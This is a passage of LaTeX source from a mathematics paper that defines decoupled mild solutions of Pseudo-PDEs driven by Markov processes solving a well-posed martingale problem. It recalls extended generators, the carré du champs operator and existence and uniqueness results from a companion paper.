not belong to the domain of $\mathcal{D}(A)$ but to be
in the domain of $S$.
In the case when Pseudo-PDEs are usual PDEs,
one think to possible solutions which are not $C^{1,2}$
but admitting a gradient, typically viscosity solutions which are
differentiable in $x$.
In that case the usual idea of
mild solutions theory applies to equations of type
\eqref{linearS}.
In this setup, inspired by \eqref{mildlinear} a mild solution of the equation is naturally
defined as a solution of the integral equation
\begin{equation}\label{E39}
u(s,\cdot)= P_{T-s}[g] + \int_s^T P_{r-s}[f(r,\cdot,u(r,\cdot),Su(r,\cdot))]dr.
\end{equation}
\item However, there may be reasons for which
the candidate solution $u$ is such that
$u(t,\cdot)$ does not even belong to $\mathcal{D}(S)$.
In the case of PDEs it is often the case for viscosity solutions of PDEs which do not admit a gradient.
In that case the idea is to replace \eqref{E39}
with
\begin{equation}
u(s,\cdot)= P_{T-s}[g] + \int_s^T P_{r-s}[f(r,\cdot,u(r,\cdot),v(r,\cdot))]dr.
\end{equation}
and to add a second equality which expresses in a {\it mild} form
the equality $v(r,\cdot) = Su(r,\cdot)$.
\end{enumerate}
We will work out previous methodology for
the $Pseudo-PDE(f,g)$. In that case
$S$ will be given by the mapping
$u\longmapsto \sqrt{\Gamma(u,u)}$.
If $A$ is the laplacian for instance one would have $\Gamma(u,u)=\|\nabla u\|^2$.
For pedagogical purposes, one can first consider an operator $a$ of
type $\partial_t+A$ when $-A$ is the generator
of a Markovian (time-homogeneous) semigroup.
In this case,
\begin{eqnarray*}
\Gamma(u,u) &=& \partial_t(u^2)+A(u^2)-2u\partial_tu-2uAu \\
&=& A(u^2) - 2uAu.
\end{eqnarray*}
Equation
\begin{equation}\label{Emilddiffusion}
\partial_tu+Au + f\left(\cdot,\cdot,u,\sqrt{\Gamma(u,u)}\right)=0,
\end{equation}
could therefore be decoupled into the system
\begin{equation}
\left\{
\begin{array}{l}
\partial_tu+Au + f(\cdot,\cdot,u,v)= 0 \\
v^2=\partial_t(u^2)+A(u^2)-2u(\partial_tu+Au),
\end{array}\right.
\end{equation}
which furthermore can be expressed as
\begin{equation}
\left\{
\begin{array}{rcl}
\partial_tu+Au &=& - f(\cdot,\cdot,u,v)\\
\partial_t(u^2)+A(u^2)&=&v^2-2uf(\cdot,\cdot,u,v)
\end{array}\right.
\end{equation}
Taking into account the existing notions of mild solution \eqref{mildlinear} (resp. \eqref{E39}), for corresponding equations \eqref{linear} (resp. \eqref{linearS}), one is naturally tempted to define a decoupled mild solution of \eqref{PDEIntro} as a function $u$ for which there exist $v\geq 0$ such that
\begin{equation}
\left\{
\begin{array}{rcl}
u(s,\cdot)&=& P_{T-s}[g] + \int_s^T P_{r-s}[f(r,\cdot,u(r,\cdot),v(r,\cdot))]dr\\
u^2(s,\cdot)&=& P_{T-s}[g^2] - \int_s^T P_{r-s}[v^2(r,\cdot)-2u(r,\cdot)f(r,\cdot,u(r,\cdot),v(r,\cdot))]dr.
\end{array}\right.
\end{equation}
As we mentioned before, our
approach is alternative to a possible notion of viscosity
solution for the $Pseudo-PDE(f,g)$. That notion will be the object of
a subsequent paper, at least in the case when the driver do not depend
on the last variable. In the general case the notion of viscosity solution
does not fit well because of lack of suitable comparison theorems.
On the other hand, even in the recent literature (see \cite{barles1997backward}) in order to show existence of viscosity solutions
specific conditions exist on the driver.
In our opinion our approach of decoupled mild solutions for $Pseudo-PDE(f,g)$
constitutes an interesting novelty even in the case of
semilinar parabolic PDEs.
The main contributions of the paper are essentially the following.
In Section \ref{mild}, Definition \ref{mildsoluv} introduces our notion of decoupled mild solution of \eqref{PDEIntro} in the general setup. In section Section \ref{mart-mild}, Proposition \ref{MartingaleImpliesMild} states that under a square integrability type condition, every martingale solution is a decoupled mild solution of \eqref{PDEIntro}. Conversely, Proposition \ref{MildImpliesMartingale} shows that every decoupled mild solution is a martingale solution. In Theorem \ref{MainTheorem} we prove existence and uniqueness of a decoupled mild solution for \eqref{PDEIntro}. In Section \ref{FBSDEs}, we show how the unique decoupled mild solution of \eqref{PDEIntro} can be represented via the FBSDEs \eqref{BSDEIntro}.
In Section \ref{exemples} we develop examples of Markov processes and corresponding operators $a$ falling into our abstract setup. In Section \ref{S4a}, we work in the setup of \cite{stroock}, the Markov process is a diffusion with jumps and the corresponding operator is of diffusion type with an additional non-local operator. In Section \ref{S4b} we consider Markov processes associated to pseudo-differential operators (typically the fractional Laplacian) as in \cite{jacob2005pseudo}. In Section \ref{S4c} we study a semilinear parabolic PDE with distributional drift, and the corresponding process is the solution an SDE with distributional drift as defined in \cite{frw1}. Finally in Section \ref{S4d} are interested with diffusions on differential manifolds and associated diffusion operators, an example being the Brownian motion in a Riemanian manifold associated to the Laplace-Beltrami operator.
\section{Preliminaries}\label{S1}
In this section we will recall the notations, notions and results of the companion paper
\cite{paper1preprint},
which will be used here.
\begin{notation}
In the whole paper, concerning functional spaces we will use the following notations.
\\
A topological space $E$ will always be considered as a measurable space with its Borel $\sigma$-field which shall be denoted $\mathcal{B}(E)$. Given two topological spaces, $E,F$, then $\mathcal{C}(E,F)$ (respectively $\mathcal{B}(E,F)$) will denote the set of functions from $E$ to $F$ which are continuous (respectively Borel) and if $F$ is a metric space, $\mathcal{C}_b(E,F)$ (respectively $\mathcal{B}_b(E,F)$) will denote the set of functions from $E$ to $F$ which are bounded continuous (respectively bounded Borel). For any $p\in[1,\infty]$, $d\in\mathbbm{N}^*$, $(L^p(\mathbbm{R}^d),\|\cdot\|_p)$ will denote the usual Lebesgue space equipped with its usual norm.
\\
\\
On a fixed probability space $\left(\Omega,\mathcal{F},\mathbbm{P}\right)$, for any $p\in\mathbbm{N}^*$, $L^p$ will denote the set of random variables with finite $p$-th moment.
\\
\\
A probability space equipped with a right-continuous filtration $\left(\Omega,\mathcal{F},(\mathcal{F}_t)_{t\in\mathbbm{T}},\mathbbm{P}\right)$ (where $\mathbbm{T}$ is equal to $\mathbbm{R}_+$ or to $[0,T]$ for some $T\in\mathbbm{R}_+^*$) will be called called a \textbf{stochastic basis} and will be said to \textbf{fulfill the usual conditions} if the probability space is complete and if $\mathcal{F}_0$ contains all the $\mathbbm{P}$-negligible sets. When a stochastic basis is fixed, $\mathcal{P}ro$ denotes the \textbf{progressive $\sigma$-field} on $\mathbbm{T}\times\Omega$.
\\
\\
On a fixed stochastic basis $\left(\Omega,\mathcal{F},(\mathcal{F}_t)_{t\in\mathbbm{T}},\mathbbm{P}\right)$, we will use the following notations and vocabulary,
concerning spaces of stochastic processes,
most of them being taken or adapted from \cite{jacod79} or \cite{jacod}.
$\mathcal{V}$ (resp $\mathcal{V}^+$) will denote the set of adapted, bounded variation (resp non-decreasing) processes starting at 0; $\mathcal{V}^p$ (resp $\mathcal{V}^{p,+}$) the elements of $\mathcal{V}$ (resp $\mathcal{V}^+$) which are predictable, and $\mathcal{V}^c$ (resp $\mathcal{V}^{c,+}$) the elements of $\mathcal{V}$ (resp $\mathcal{V}^+$) which are continuous.
\\
$\mathcal{M}$ will be the space of cadlag martingales.
For any $p\in[1,\infty]$ $\mathcal{H}^p$ will denote
the subset of $\mathcal{M}$ of elements $M$ such that $\underset{t\in \mathbbm{T}}{\text{sup }}|M_t|\in L^p$ and in this set we identify indistinguishable elements. It is a Banach space for the norm
$\| M\|_{\mathcal{H}^p}=\mathbbm{E}[|\underset{t\in \mathbbm{T}}{\text{sup }}M_t|^p]^{\frac{1}{p}}$, and
$\mathcal{H}^p_0$ will denote the Banach subspace of $\mathcal{H}^p$
containing the elements starting at zero.
\\
If $\mathbbm{T}=[0,T]$ for some $T\in\mathbbm{R}_+^*$, a stopping time will be considered as a random variable with values in
$[0,T]\cup\{+\infty\}$.
We define a \textbf{localizing sequence of stopping times} as an increasing sequence of stopping times $(\tau_n)_{n\geq 0}$ such that there exists $N\in\mathbbm{N}$ for which $\tau_N=+\infty$. Let $Y$ be a process and $\tau$ a stopping time, we denote $Y^{\tau}$ the process $t\mapsto Y_{t\wedge\tau}$ which we call \textbf{stopped process}. If $\mathcal{C}$ is a set of processes, we define its \textbf{localized class} $\mathcal{C}_{loc}$ as the set of processes $Y$ such that there exist a localizing sequence $(\tau_n)_{n\geq 0}$ such that for every $n$, the stopped process $Y^{\tau_n}$ belongs to $\mathcal{C}$.
\\
For any $M\in \mathcal{M}_{loc}$, we denote $[M]$ its \textbf{quadratic variation} and if moreover $M\in\mathcal{H}^2_{loc}$, $\langle M\rangle$ will denote its (predictable) \textbf{angular bracket}.
$\mathcal{H}_0^2$ will be equipped with scalar product defined by $(M,N)_{\mathcal{H}^2}=\mathbbm{E}[M_TN_T]
=\mathbbm{E}[\langle M, N\rangle_T] $ which makes it a Hilbert space.
Two local martingales $M,N$ will be said to be \textbf{strongly orthogonal} if $MN$ is a local martingale starting in 0 at time 0. In $\mathcal{H}^2_{0,loc}$ this notion is equivalent to $\langle M,N\rangle=0$.
\end{notation}
Concerning the following definitions and results, we are given some $T\in\mathbbm{R}_+^*$, and a stochastic basis $\left(\Omega,\mathcal{F},(\mathcal{F}_t)_{t\in[0,T]},\mathbbm{P}\right)$ fulfilling the usual conditions.
\begin{definition} \label{StochMeasures}
Let $A$ and $B$ be in $\mathcal{V}^+$. We will say that $dB$ dominates $dA$
{\bf in the sense of stochastic measures} (written $dA\ll dB$) if for almost all $\omega$, $dA(\omega)\ll dB(\omega)$ as Borel measures on $[0,T]$.
\\
\\
Let $B\in \mathcal{V}^+$. $dB\otimes d\mathbbm{P}$ will denote the positive measure on
$(\Omega\times [0,T],\mathcal{F}\otimes\mathcal{B}([0,T]))$ defined for any $F\in\mathcal{F}\otimes\mathcal{B}([0,T])$ by
$dB\otimes d\mathbbm{P}( F) = \mathbbm{E}\left[\int_0^{T}\mathds{1}_F(t,\omega)dB_t(\omega)\right]$.
A property which holds true everywhere except on a null set for
this measure will be said to be true $dB\otimes d\mathbbm{P}$ almost
everywhere (a.e.).
\end{definition}
We recall that given two processes $A,B$ in $\mathcal{V}^{p,+}$, if $dA\ll dB$, there exists a predictable process which we will denote $\frac{dA}{dB}$ and call \textbf{Radon-Nikodym derivative} of $A$ by $B$, verifying $A=\int_0^{\cdot}\frac{dA}{dB}(r)dB_r$, see Proposition I.3.13 in \cite{jacod}.
\\
As in previous paper
\cite{paper1preprint}
we will be interested in
a Markov process which is
the solution of a martingale problem which we now recall below.
For definitions and results concerning Markov processes, the reader may refer to Appendix \ref{A2}. In particular, let $E$ be a Polish space and $T\in\mathbbm{R}_+$ be a finite value we now consider $\left(\Omega,\mathcal{F},(X_t)_{t\in[0,T]},(\mathcal{F}_t)_{t\in[0,T]}\right)$ the canonical space which was introduced in Notation \ref{canonicalspace}, and a canonical Markov class measurable in time $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times E}$, see Definitions \ref{defMarkov} and \ref{DefFoncTrans}. We will also consider the completed stochastic basis $\left(\Omega,\mathcal{F}^{s,x},(\mathcal{F}^{s,x}_t)_{t\in[0,T]},\mathbbm{P}^{s,x}\right)$,
see Definition \ref{CompletedBasis}.
\\
\\
We now recall what the notion of martingale problem associated to
an operator introduced in Section 4 of \cite{paper1preprint}.
\begin{definition}\label{MartingaleProblem}
Given a linear algebra $\mathcal{D}(a)\subset \mathcal{B}([0,T]\times E,\mathbbm{R})$, a linear operator $a$ mapping $\mathcal{D}(a)$ into $\mathcal{B}([0,T]\times E,\mathbbm{R})$ and a non-decreasing continuous function $V:[0,T]\rightarrow\mathbbm{R}_+$ starting at $0$, we say that a set of probability measures $(\mathbbm{P}^{s,x})_{(s,x)\in [0,T]\times E}$ defined on $(\Omega,\mathcal{F})$ solves the {\bf Martingale Problem associated to} $(\mathcal{D}(a),a,V)$ if, for any
$(s,x)\in[0,T]\times E$, $\mathbbm{P}^{s,x}$ verifies
\begin{description}
\item{(a)} $\mathbbm{P}^{s,x}(\forall t\in[0,s], X_t=x)=1$;
\item{(b)} for every $\phi\in\mathcal{D}(a)$, the process $\phi(\cdot,X_{\cdot})-\int_s^{\cdot}a(\phi)(r,X_r)dV_r$, $t \in [s,T]$
is a cadlag $(\mathbbm{P}^{s,x},(\mathcal{F}_t)_{t\in[s,T]})$-local martingale.
\end{description}
We say that the {\bf Martingale Problem is well-posed} if for any $(s,x)\in[0,T]\times E$, $\mathbbm{P}^{s,x}$ is the only probability measure
satisfying the properties (a) and (b).
\end{definition}
As for \cite{paper1preprint},
in the sequel of the paper we will assume the following.
\begin{hypothesis}\label{MPwellposed}
The Markov class $(\mathbbm{P}^{s,x})_{(s,x)\in [0,T]\times E}$ solves a well-posed Martingale Problem
associated to a triplet $(\mathcal{D}(a),a,V)$ in the sense
of Definition \ref{MartingaleProblem}.
\end{hypothesis}
\begin{notation}\label{Mphi}
For every $(s,x)\in[0,T]\times E$ and $\phi\in\mathcal{D}(a)$, the process
\\
$t\mapsto\mathds{1}_{[s,T]}(t)\left(\phi(t,X_{t})-\phi(s,x)-\int_s^{t}a(\phi)(r,X_r)dV_r\right)$ will be denoted $M[\phi]^{s,x}$.
\end{notation}
$M[\phi]^{s,x}$ is a cadlag $(\mathbbm{P}^{s,x},(\mathcal{F}_t)_{t\in[0,T]})$-local martingale equal to $0$ on $[0,s]$, and by Proposition \ref{ConditionalExp}, it is also a $(\mathbbm{P}^{s,x},(\mathcal{F}^{s,x}_t)_{t\in[0,T]})$-local martingale.
\\
\\
The bilinear operator below was introduced (in the case of time-homogeneous operators) by J.P. Roth in potential analysis (see Chapter III in \cite{roth}),
and popularized by P.A. Meyer and others in the study of homogeneous Markov processes
(see for example Expos\'e II: L'op\'erateur carr\'e du champs in \cite{sem10} or 13.46 in \cite{jacod79}).
\begin{definition}\label{SFO}
We introduce the bilinear operator
\begin{equation}
\Gamma : \begin{array}{r c l}
\mathcal{D}(a) \times \mathcal{D}(a) & \rightarrow & \mathcal{B}([0,T]\times E) \\
(\phi, \psi) & \mapsto & a(\phi\psi) - \phi a(\psi) - \psi a(\phi).
\end{array}
\end{equation}
The operator $\Gamma$ is
called the \textbf{carr\'e du champs operator}.
\end{definition}
The angular bracket of the martingales introduced in Notation \ref{Mphi}
are expressed via the operator $\Gamma$. Proposition 4.8 of
\cite{paper1preprint},
tells the following.
\begin{proposition}\label{bracketindomain}
For any $\phi\in \mathcal{D}(a)$ and $(s,x)\in[0,T]\times E$, $M[\phi]^{s,x}$ is in $\mathcal{H}^2_{0,loc}$.
Moreover, for any $(\phi, \psi)\in \mathcal{D}(a) \times \mathcal{D}(a)$ and $(s,x)\in[0,T]\times E$ we have in $(\Omega,\mathcal{F}^{s,x},(\mathcal{F}^{s,x}_t)_{t\in[0,T]},\mathbbm{P}^{s,x})$ and on the interval $[s,T]$
\begin{equation}
\langle M[\phi]^{s,x} , M[\psi]^{s,x} \rangle = \int_s^{\cdot} \Gamma(\phi,\psi)(r,X_r)dV_r.
\end{equation}
\end{proposition}
We introduce some significant spaces related to $V$.
\begin{notation} \label{D212}
$\mathcal{H}^{2,V} := \{M\in\mathcal{H}^2_0|d\langle M\rangle \ll dV\}$.
\\
We will also denote $\mathcal{L}^2(dV\otimes d\mathbbm{P})$ the set of (up to indistinguishability)
progressively measurable processes $\phi$ such that $\mathbbm{E}[\int_0^T \phi^2_rdV_r]<\infty$.
\end{notation}
Proposition 4.11 of
\cite{paper1preprint}
says the following.
\begin{proposition}\label{H2V=H2}
If Hypothesis \ref{MPwellposed} is verified then under any $\mathbbm{P}^{s,x}$,
\\
$\mathcal{H}_0^2=\mathcal{H}^{2,V}$, where $\mathcal{H}^{2,V}$.
\end{proposition}
Later in this paper, several functional equations will
be intended up to what we call a set of \textbf{zero potential}
that we recall below.
\begin{definition}\label{zeropotential}
For any $(s,x)\in[0,T]\times E$ we define the \textbf{potential measure} $U(s,x,\cdot)$ on $\mathcal{B}([0,T]\times E)$ by
$U(s,x,A) := \mathbbm{E}^{s,x}\left[\int_s^{T} \mathds{1}_{\{(t,X_t)\in A\}}dV_t\right]$.
\\
A Borel set $A\in\mathcal{B}([0,T]\times E)$ will be said to be
{\bf of zero potential} if, for any $(s,x)\in[0,T]\times E$ we have $U(s,x,A) = 0$.
\end{definition}
\begin{notation}\label{topo}
Let $p > 0$, we define
\\
$\mathcal{L}^p_{s,x} :=\left\{ f\in \mathcal{B}([0,T]\times E,\mathbbm{R}):\, \mathbbm{E}^{s,x}\left[\int_s^{T} |f|^p(r,X_r)dV_r\right] < \infty\right\}$ on which we introduce the usual semi-norm $\|\cdot\|_{p,s,x}: f\mapsto\left(\mathbbm{E}^{s,x}\left[\int_s^{T}|f(r,X_r)|^pdV_r\right]\right)^{\frac{1}{p}}$
We also denote
$\mathcal{L}^0_{s,x} :=\left\{ f\in \mathcal{B}([0,T]\times E,\mathbbm{R}):\, \int_s^{T} |f|(r,X_r)dV_r < \infty\,\mathbbm{P}^{s,x}\text{ a.s. }\right\}$.
\\
For any $p \ge0$, we then define an intersection of these spaces,
i.e.
\\
$\mathcal{L}^p_X:=\underset{(s,x)\in[0,T]\times E}{\bigcap}\mathcal{L}^p_{s,x}$.
\\
Finally, let $\mathcal{N}$ the sub-linear space of $\mathcal{B}([0,T]\times E,\mathbbm{R})$ containing all functions which are equal to 0 $U(s,x,\cdot)$ a.e. for every $(s,x)$. For any $p\in \mathbbm{N}$, we define the quotient space $L^p_X := \mathcal{L}^p_X /\mathcal{N}$.
If $p\geq 1$, $L^p_X$ can be equipped with the topology generated by the family of semi-norms $\left(\|\cdot\|_{p,s,x}\right)_{(s,x)\in[0,T]\times E}$ which makes it into a separate locally convex topological vector space.
\end{notation}
The statement below was stated in Proposition 4.14 of
\cite{paper1preprint}.
\begin{proposition}\label{uniquenessupto}
Let $f$ and $g$ be in $\mathcal{B}([0,T]\times E,\mathbbm{R})$ such that the processes $\int_s^{\cdot}f(r,X_r)dV_r$ and $\int_s^{\cdot}g(r,X_r)dV_r$ are finite $\mathbbm{P}^{s,x}$ a.s. for any $(s,x) \in [0,T] \times E$.
Then $f$ and $g$ are equal up a zero potential set if and only if $\int_s^{\cdot}f(r,X_r)dV_r$ and $\int_s^{\cdot}g(r,X_r)dV_r$ are indistinguishable under $\mathbbm{P}^{s,x}$ for any $(s,x)\in[0,T]\times E$.
\end{proposition}
We recall that if two functions $f, g$ differ
only on a zero potential set then they represent the same element of $L^p_X$.
We recall our notion of \textbf{extended generator}.
\begin{definition}\label{domainextended}
We first define the \textbf{extended domain} $\mathcal{D}(\mathfrak{a})$ as the set functions $\phi\in\mathcal{B}([0,T]\times E,\mathbbm{R})$ for which there exists
$\psi\in\mathcal{B}([0,T]\times E,\mathbbm{R})$ such that under any $\mathbbm{P}^{s,x}$ the process
\begin{equation} \label{E45}
\mathds{1}_{[s,T]}\left(\phi(\cdot,X_{\cdot}) - \phi(s,x) - \int_s^{\cdot}\psi(r,X_r)dV_r \right)
\end{equation}
(which is not necessarily cadlag) has a cadlag modification in $\mathcal{H}^2_{0}$.
\end{definition}
Proposition 4.16 in \cite{paper1preprint}
states the following.
\begin{proposition}\label{uniquenesspsi}
Let $\phi \in {\mathcal B}([0,T] \times E, {\mathbbm R}).$
There is at most one (up to zero potential sets) $\psi
\in {\mathcal B}([0,T] \times E, {\mathbbm R})$ such that
under any $\mathbbm{P}^{s,x}$, the process defined in \eqref{E45}
has a modification which belongs to ${\mathcal M}_{loc}$.
\\
If moreover $\phi\in\mathcal{D}(a)$, then $a(\phi)=\psi$ up to zero potential sets. In this case, according to Notation \ref{Mphi},
for every $(s,x)\in[0,T]\times E$,
$M[\phi]^{s,x}$ is the $\mathbbm{P}^{s,x}$ cadlag modification
in $\mathcal{H}^2_{0}$ of
$\mathds{1}_{[s,T]}\left(\phi(\cdot,X_{\cdot}) - \phi(s,x) - \int_s^{\cdot}\psi(r,X_r)dV_r \right)$.
\end{proposition}
\begin{definition}\label{extended}
Let $\phi \in \mathcal{D}(\mathfrak{a})$ as in Definition
\ref{domainextended}.
We denote again by $M[\phi]^{s,x}$, the unique
cadlag version
of the process \eqref{E45} in $\mathcal{H}^2_{0}$.
Taking Proposition \ref{uniquenessupto} into account, this will not
generate any ambiguity with respect
to Notation \ref{Mphi}.
Proposition \ref{uniquenessupto}, also permits to define without ambiguity the operator
\begin{equation*}
\mathfrak{a}:
\begin{array}{rcl}
\mathcal{D}(\mathfrak{a})&\longrightarrow& L^0_X\\
\phi &\longmapsto & \psi.
\end{array}
\end{equation*}
$\mathfrak{a}$ will be called the \textbf{extended generator}.
\end{definition}
We also extend the carr\'e du champs operator $\Gamma(\cdot,\cdot)$
to $\mathcal{D}(\mathfrak{a})\times\mathcal{D}(\mathfrak{a})$.
Proposition 4.18 in
\cite{paper1preprint}
states the following.
\begin{proposition} \label{P321}
Let $\phi$ and $\psi$ be in $\mathcal{D}(\mathfrak{a})$, there exists a (unique up to zero-potential sets) function in $\mathcal{B}([0,T]\times E,\mathbbm{R})$ which we will denote $\mathfrak{G}(\phi,\psi)$ such that under any $\mathbbm{P}^{s,x}$,
$\langle M[\phi]^{s,x},M[\psi]^{s,x}\rangle=\int_s^{\cdot}\mathfrak{G}(\phi,\psi)(r,X_r)dV_r$ on $[s,T]$, up to indistinguishability.
If moreover $\phi$ and $\psi$ belong to $\mathcal{D}(a)$, then $\Gamma(\phi,\psi)=\mathfrak{G}(\phi,\psi)$ up to zero potential sets.
\end{proposition}
\begin{definition}\label{extendedgamma}
The bilinear operator $\mathfrak{G}:\mathcal{D}(\mathfrak{a})\times\mathcal{D}(\mathfrak{a})\longmapsto L^0_X$ will be called the \textbf{extended carr\'e du champs operator}.
\end{definition}
According to Definition \ref{domainextended}, we do not have
necessarily $\mathcal{D}(a)\subset\mathcal{D}(\mathfrak{a})$,
however we have the following.
\begin{corollary}\label{RExtendedClassical}
If $\phi\in\mathcal{D}(a)$ and $\Gamma(\phi,\phi)\in\mathcal{L}^1_X$,
then $\phi\in\mathcal{D}(\mathfrak{a})$ and $(a(\phi),\Gamma(\phi,\phi))=(\mathfrak{a}(\phi),\mathfrak{G}(\phi,\phi))$ up to zero potential sets.
\end{corollary}
We also recall Lemma 5.12 of
\cite{paper1preprint}.
\begin{lemma}\label{ModifImpliesdV}
Let $(s,x)\in[0,T]\times E$ be fixed and let $\phi,\psi$ be two measurable processes. If $\phi$ and $\psi$ are $\mathbbm{P}^{s,x}$-modifications of each other, then they are equal $dV\otimes d\mathbbm{P}^{s,x}$ a.e.
\end{lemma}
We now keep in mind the Pseudo-Partial Differential Equation (in short
Pseudo-PDE), with final condition,
that we have introduced in
\cite{paper1preprint}.
\\
Let us consider the following data.
\begin{enumerate}
\item A measurable final condition
$g\in\mathcal{B}(E,\mathbbm{R})$;
\item a measurable nonlinear function
$f\in\mathcal{B}([0,T]\times E\times\mathbbm{R}\times\mathbbm{R},\mathbbm{R})$.
\end{enumerate}
The equation is
\begin{equation}\label{PDE}
\left\{
\begin{array}{rccc}
a(u)(t,x) + f\left(t,x,u(t,x),\sqrt{\Gamma(u,u)(t,x)}\right)&=&0& \text{ on } [0,T]\times E \\
u(T,\cdot)&=&g.&
\end{array}\right.
\end{equation}
\begin{notation}
Equation \eqref{PDE} will be denoted $Pseudo-PDE(f,g)$.
\end{notation}
\begin{definition}\label{MarkovPDE}
We will say that $u$ is a \textbf{classical solution} of
$Pseudo-PDE(f,g)$
if it belongs to $\mathcal{D}(a)$ and verifies \eqref{PDE}.
\end{definition}
\begin{definition} \label{D417}
A function $u: [0,T] \times E \rightarrow {\mathbbm R}$
will be said
to be a {\bf martingale solution} of $Pseudo-PDE(f,g)$ if
$u\in\mathcal{D}(\mathfrak{a})$ and
\begin{equation}\label{PDEextended}
\left\{\begin{array}{rcl}
\mathfrak{a}(u)&=& -f(\cdot,\cdot,u,\sqrt{\mathfrak{G}(u,u)})\\
u(T,\cdot)&=&g.
\end{array}\right.
\end{equation}
\end{definition}
Until the end of these preliminaries, we will assume some generalized
moments conditions on $X$, and some growth conditions
on the functions $(f,g)$. Those will be related to
two functions $\zeta,\eta \in\mathcal{B}(E,\mathbbm{R}_+)$.
\begin{hypothesis}\label{HypMom}
The Markov class will be said \textbf{to verify} $H^{mom}(\zeta,\eta)$ if
\begin{enumerate}
\item for any $(s,x)\in[0,T]\times E$, $\mathbbm{E}^{s,x}[\zeta^2(X_T)]$ is finite;
\item for any $(s,x)\in[0,T]\times E$, $\mathbbm{E}^{s,x}\left[\int_0^T\eta^2(X_r)dV_r\right]$ is finite.
\end{enumerate}
\end{hypothesis}
\begin{hypothesis}\label{Hpq}
A couple of functions
\\
$f\in\mathcal{B}([0,T]\times E\times\mathbbm{R}\times\mathbbm{R},\mathbbm{R})$ and $g\in\mathcal{B}(E,\mathbbm{R})$ will be said \textbf{to verify} $H^{lip}(\zeta,\eta)$ if
there exist positive constants $K^Y,K^Z,C,C'$ such that
\begin{enumerate}
\item $\forall x: \quad |g(x)|\leq C(1+\zeta(x))$;
\item $\forall (t,x):\quad |f(t,x,0,0)|\leq C'(1+\eta(x))$;
\item $\forall (t,x,y,y',z,z'):\quad |f(t,x,y,z)-f(t,x,y',z)|\leq K^Y|y-y'|+K^Z|z-z'|$.
\end{enumerate}
Finally, if we assume that $g$ and $f(\cdot,\cdot,0,0)$ are bounded, we will say that {\bf they
verify} $H^{lip}_b$.
\end{hypothesis}
\begin{remark}
Even if the underlying process $X$ admits no generalized moments, given
a couple $(f,g)$ verifying $H^{lip}_b$, the considerations of this paper still apply.
\end{remark}
We conclude these preliminaries by stating the Theorem of existence and uniqueness of a martingale solution for $Pseudo-PDE(f,g)$. It was the
object of Theorem 5.21 of \cite{paper1preprint}.
\begin{theorem} \label{RMartExistenceUniqueness}
Let $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times E}$ be a Markov class associated to a transition function measurable
in time (see Definitions \ref{defMarkov} and \ref{DefFoncTrans}) which
fulfills Hypothesis \ref{MPwellposed},
i.e. it is a solution of a well-posed Martingale Problem associated with
the triplet $(\mathcal{D}(a),a,V)$.
Moreover we suppose Hypothesis $H^{mom}(\zeta,\eta)$ for some positive
$\zeta,\eta$. Let $(f,g)$ be a couple verifying $H^{lip}(\zeta,\eta)$,
cf. Hypothesis \ref{Hpq}.
Then $Pseudo-PDE(f,g)$ has a unique martingale solution.
\end{theorem}
We also had shown (see Proposition 5.19 in
\cite{paper1preprint}) that the unique martingale solution is the only possible classical solution if there is one, as stated below.
\begin{proposition}\label{CoroClassic}
Under the conditions of previous Theorem \ref{RMartExistenceUniqueness},
a classical solution $u$ of $Pseudo-PDE(f,g)$ such that
$\Gamma(u,u)\in\mathcal{L}^1_X$, is also a martingale solution.
\\
Conversely, if $u$ is a martingale solution of $Pseudo-PDE(f,g)$
belonging to $\mathcal{D}(a)$, then $u$ is a classical solution of $Pseudo-PDE(f,g)$ up to a zero-potential set, meaning that the first equality of \eqref{PDE} holds up to a set of zero potential.
\end{proposition}
\section{Decoupled mild solutions of Pseudo-PDEs}\label{S2}
All along this section we will consider a canonical Markov class $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times E}$ associated to a transition function $p$ measurable in time (see Definitions \ref{defMarkov}, \ref{DefFoncTrans}) verifying Hypothesis \ref{MPwellposed} for a certain $(\mathcal{D}(a),a,V)$. Positive functions $\zeta,\eta$ are fixed
and we will assume that the Markov class verifies $H^{mom}(\zeta,\eta)$,
see Hypothesis \ref{HypMom}. We are also given a couple of functions $f\in\mathcal{B}([0,T]\times E\times\mathbbm{R}\times\mathbbm{R},\mathbbm{R})$ and $g\in\mathcal{B}(E,\mathbbm{R})$.
\subsection{Definition}\label{mild}
As mentioned in the introduction, in this section we introduce
a notion of solution of
our $Pseudo-PDE(f,g)$ that we will denominate {\it decoupled mild}, which
is a generalization of the mild solution concept for partial differential equation.
We will show that such solution exists and is unique.
Indeed, that function will be the one appearing in Theorem \ref{Defuv}.
A function $u$ will be a {\it decoupled mild} solution of
$Pseudo-PDE(f,g)$ if there is a function $v$
such that the couple $(u,v)$ is a (decoupled mild) solution of the
identification problem $IP(f,g)$.
In this section we first go through a notion of {\it decoupled mild solution}
for the identification problem, which has particular interest in itself.
We will be interested in functions $(f,g)$ which satisfy weaker
conditions than those of type $H^{lip}(\zeta,\eta)$ (see Hypothesis \ref{Hpq})
namely the following ones.
\begin{hypothesis}\label{Hpqeq}
A couple of functions
\\
$f\in\mathcal{B}([0,T]\times E\times\mathbbm{R}\times\mathbbm{R},\mathbbm{R})$ and $g\in\mathcal{B}(E,\mathbbm{R})$ will be said \textbf{to verify} $H^{growth}(\zeta,\eta)$ if
there exist positive constants $C,C'$ such that
\begin{enumerate}
\item $\forall x: \quad |g(x)|\leq C(1+\zeta(x))$;
\item $\forall (t,x,y,z):\quad |f(t,x,y,z)|\leq C'(1+\eta(x)+|y|+|z|)$.
\end{enumerate}
\end{hypothesis}
\begin{notation}
Let $s,t$ in $[0,T]$ with $s\leq t$, $x\in E$ and $\phi\in \mathcal{B}(E,\mathbbm{R})$, if the expectation $\mathbbm{E}^{s,x}[|\phi(X_t)|]$ is finite, then $P_{s,t}[\phi](x)$ will denote $\mathbbm{E}^{s,x}[\phi(X_t)]$ .
\end{notation}
We recall two important measurability properties.
\begin{remark} Let $\phi\in\mathcal{B}(E,\mathbbm{R})$.
\begin{itemize}
\item Suppose that for any $(s,x,t)$,
$\mathbbm{E}^{s,x}[|\phi(X_t)|]<\infty$ then by Proposition \ref{measurableint}, $(s,x,t)\longmapsto P_{s,t}[\phi](x)$ is Borel.
\item Suppose that for every $(s,x)$, $\mathbbm{E}^{s,x}[\int_s^{T}|\phi(X_r)|dV_r]<\infty$. Then by Lemma \ref{LemmaBorel},
$(s,x)\longmapsto\int_s^TP_{s,r}[\phi](x)dVr$ is Borel.
\end{itemize}
\end{remark}
In our general setup, considering some operator $a$, the equation
\begin{equation}
